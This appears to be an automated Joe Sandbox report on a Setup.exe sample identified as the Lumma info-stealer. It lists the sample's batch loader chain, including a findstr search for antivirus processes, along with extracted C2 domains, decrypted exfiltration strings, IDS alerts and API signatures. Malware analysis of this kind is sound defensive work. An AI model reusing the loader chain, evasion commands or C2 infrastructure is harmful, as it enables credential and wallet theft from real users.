Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1580131
MD5:588eeb3d8f305fc008f034e10e0015c0
SHA1:7a77ed807fbea72e7c94295343cf795e864adfae
SHA256:d46db03077a8a6773fd70b126d8f3d61e8370ed0c1dfb26df73499cb3b65355f
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 4040 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 588EEB3D8F305FC008F034E10E0015C0)
    • cmd.exe (PID: 2700 cmdline: "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1560 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3440 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1396 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6224 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3276 cmdline: cmd /c md 280366 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 2684 cmdline: extrac32 /Y /E Agrees MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 5160 cmdline: findstr /V "Travels" Served MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2704 cmdline: cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Hc.com (PID: 2128 cmdline: Hc.com I MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 1896 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["manyrestro.lat", "shapestickyr.lat", "slipperyloo.lat", "curverpluch.lat", "hungrypaster.click", "talkynicer.lat", "bashfulacid.lat", "tentabatte.lat", "wordyfindy.lat"], "Build id": "hRjzG3--GAS"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2700, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6224, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T01:26:37.505366+010020283713Unknown Traffic192.168.2.549731188.114.96.6443TCP
      2024-12-24T01:26:39.991057+010020283713Unknown Traffic192.168.2.549737188.114.96.6443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T01:26:38.792709+010020546531A Network Trojan was detected192.168.2.549731188.114.96.6443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T01:26:38.792709+010020498361A Network Trojan was detected192.168.2.549731188.114.96.6443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 0000000C.00000002.2352426923.0000000001861000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["manyrestro.lat", "shapestickyr.lat", "slipperyloo.lat", "curverpluch.lat", "hungrypaster.click", "talkynicer.lat", "bashfulacid.lat", "tentabatte.lat", "wordyfindy.lat"], "Build id": "hRjzG3--GAS"}
      Sample uses string decryption to hide its real strings
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: bashfulacid.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: tentabatte.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: curverpluch.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: talkynicer.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: shapestickyr.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: manyrestro.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: slipperyloo.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: wordyfindy.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: hungrypaster.click
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: bashfulacid.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: tentabatte.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: curverpluch.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: talkynicer.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: shapestickyr.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: manyrestro.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: slipperyloo.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: wordyfindy.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: hungrypaster.click
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: hRjzG3--GAS
      Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.5:49731 version: TLS 1.2
      Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0068DC54
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0069A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0069A087
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0069A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0069A1E2
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_0068E472
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0069A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_0069A570
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0065C622 FindFirstFileExW,12_2_0065C622
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006966DC FindFirstFileW,FindNextFileW,FindClose,12_2_006966DC
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00697333 FindFirstFileW,FindClose,12_2_00697333
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_006973D4
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0068D921
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\280366Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\280366\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49731 -> 188.114.96.6:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49731 -> 188.114.96.6:443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: manyrestro.lat
      Source: Malware configuration extractorURLs: shapestickyr.lat
      Source: Malware configuration extractorURLs: slipperyloo.lat
      Source: Malware configuration extractorURLs: curverpluch.lat
      Source: Malware configuration extractorURLs: hungrypaster.click
      Source: Malware configuration extractorURLs: talkynicer.lat
      Source: Malware configuration extractorURLs: bashfulacid.lat
      Source: Malware configuration extractorURLs: tentabatte.lat
      Source: Malware configuration extractorURLs: wordyfindy.lat
      Source: Joe Sandbox ViewIP Address: 188.114.96.6 188.114.96.6
      Source: Joe Sandbox ViewIP Address: 188.114.96.6 188.114.96.6
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 188.114.96.6:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49737 -> 188.114.96.6:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hungrypaster.click
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0069D889 InternetReadFile,SetEvent,GetLastError,SetEvent,12_2_0069D889
      Source: global trafficDNS traffic detected: DNS query: PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA
      Source: global trafficDNS traffic detected: DNS query: hungrypaster.click
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hungrypaster.click
      Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Setup.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
      Source: Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
      Source: Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: Setup.exeString found in binary or memory: http://ocsps.ssl.com0
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Hc.com, 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp, Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Developers.9.dr, Hc.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: Setup.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
      Source: Hc.com, 0000000C.00000002.2353015147.0000000003EF0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000C.00000002.2352426923.00000000018D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click/
      Source: Hc.com, 0000000C.00000002.2352426923.0000000001844000.00000004.00000020.00020000.00000000.sdmp, Hc.com, 0000000C.00000002.2352371273.0000000001815000.00000004.00000020.00020000.00000000.sdmp, Hc.com, 0000000C.00000002.2352426923.0000000001901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click/api
      Source: Hc.com, 0000000C.00000002.2352426923.0000000001901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click/apiX
      Source: Hc.com, 0000000C.00000002.2353015147.0000000003EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click/zj
      Source: Hc.com, 0000000C.00000002.2352128877.00000000016D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click:443/api
      Source: Hc.com, 0000000C.00000002.2352128877.00000000016D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click:443/api0r101r102r115r118r101r120r115r118r125r51r73r118r116r51r84r105r114r
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Fw.9.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: Setup.exeString found in binary or memory: https://www.ssl.com/repository0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownHTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.5:49731 version: TLS 1.2
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0069F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_0069F7C7
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0069F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_0069F55C
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006B9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_006B9FD2
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00694763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,12_2_00694763
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00681B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00681B4D
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_0068F20D
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\EngagementRisksJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\LordGarminJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\BarcelonaTrannyJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\LabInterfacesJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004049A80_2_004049A8
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0064801712_2_00648017
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0063E14412_2_0063E144
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0062E1F012_2_0062E1F0
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0065A26E12_2_0065A26E
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006422A212_2_006422A2
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006222AD12_2_006222AD
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0063C62412_2_0063C624
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0065E87F12_2_0065E87F
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006AC8A412_2_006AC8A4
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00692A0512_2_00692A05
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00656ADE12_2_00656ADE
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00688BFF12_2_00688BFF
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0063CD7A12_2_0063CD7A
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0064CE1012_2_0064CE10
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0065715912_2_00657159
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0062924012_2_00629240
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006B531112_2_006B5311
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006296E012_2_006296E0
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0064170412_2_00641704
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00641A7612_2_00641A76
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00629B6012_2_00629B60
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00647B8B12_2_00647B8B
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00641D2012_2_00641D20
